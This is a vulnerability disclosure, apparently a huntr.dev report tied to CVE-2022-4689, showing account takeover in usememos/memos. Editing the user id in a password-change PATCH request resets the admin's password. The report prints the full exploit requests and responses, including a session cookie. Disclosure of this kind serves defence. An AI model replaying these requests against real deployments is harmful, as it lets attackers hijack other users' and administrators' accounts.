Lucene search
Mohamedabdelhady933A78C4326-6E7B-47FE-AA82-461E5C12A4E3HistoryDec 19, 2022 - 6:31 p.m.
Account takeover via changing password
2022-12-1918:31:03
mohamedabdelhady933
www.huntr.dev
22
account takeover
password change
user settings
api request
response
security vulnerability
EPSS
0.001
Percentile
37.0%
Description
after login with normal user go to Settings then change password ,you will find the following request
PATCH /api/user/104 HTTP/2
Host: demo.usememos.com
Cookie: memos_session=MTY3MTQ3MjA1M3xEdi1EQkFFQ180UUFBUkFCRUFBQUhfLUVBQUVHYzNSeWFXNW5EQWtBQjNWelpYSXRhV1FEYVc1MEJBTUFfOUE9fF-6AEnsMyuj8shTHmH9_q-nZgcVnIaW9EHKAC4Ncnrl
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 30
Referer: https://demo.usememos.com/
Origin: https://demo.usememos.com
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
{"id":104,"password":"xthemo"}
The response of changing password is
HTTP/2 200 OK
Date: Mon, 19 Dec 2022 17:48:17 GMT
Content-Type: application/json; charset=UTF-8
Content-Length: 269
Cf-Ray: 77c1f7d9bae011c1-MRS
Access-Control-Allow-Origin: *
Vary: Accept-Encoding
Cf-Cache-Status: DYNAMIC
Server: cloudflare
Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
{"data":{"id":104,"rowStatus":"NORMAL","createdTs":1671469980,"updatedTs":1671472096,"username":"test","role":"USER","email":"","nickname":"test","openId":"40edea21-d038-44ec-be61-c9699e925bb6","userSettingList":[{"UserID":104,"key":"appearance","value":"\"dark\""}]}}
If you change the “id” in request to 101 (admin account) it will change his password as the following request
PATCH /api/user/104 HTTP/2
Host: demo.usememos.com
Cookie: memos_session=MTY3MTQ3MjA1M3xEdi1EQkFFQ180UUFBUkFCRUFBQUhfLUVBQUVHYzNSeWFXNW5EQWtBQjNWelpYSXRhV1FEYVc1MEJBTUFfOUE9fF-6AEnsMyuj8shTHmH9_q-nZgcVnIaW9EHKAC4Ncnrl
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 30
Referer: https://demo.usememos.com/
Origin: https://demo.usememos.com
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
{"id":101,"password":"xthemo"}
It will change id 101 password also as in the following response
HTTP/2 200 OK
Date: Mon, 19 Dec 2022 17:48:31 GMT
Content-Type: application/json; charset=UTF-8
Content-Length: 271
Cf-Ray: 77c1f8340edb11c1-MRS
Access-Control-Allow-Origin: *
Vary: Accept-Encoding
Cf-Cache-Status: DYNAMIC
Server: cloudflare
Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
{"data":{"id":101,"rowStatus":"NORMAL","createdTs":1671455650,"updatedTs":1671472111,"username":"demohero","role":"HOST","email":"[email protected]","nickname":"Demo Hero","openId":"demo_open_id","userSettingList":[{"UserID":104,"key":"appearance","value":"\"dark\""}]}}
POC video
https://drive.google.com/file/d/1y2Czg9j4Qgc9mg5Ad3W8DY18ZoRyZkzd/view?usp=sharing
Related
osv
osv
CVE-2022-4689
2022-12-23 12:15:12
usememos/memos vulnerable to account takeover due to improper access control in github.com/usememos/memos
2024-08-21 16:03:59
usememos/memos vulnerable to account takeover due to improper access control
2022-12-23 12:30:25
cvelist
cvelist
CVE-2022-4689 Improper Access Control in usememos/memos
2022-12-23 00:00:00
nvd
nvd
CVE-2022-4689
2022-12-23 12:15:12
prion
prion
Improper access control
2022-12-23 12:15:00
github
github
usememos/memos vulnerable to account takeover due to improper access control
2022-12-23 12:30:25
veracode
veracode
Improper Access Control
2023-01-02 17:04:02
cve
cve
CVE-2022-4689
2022-12-23 12:15:12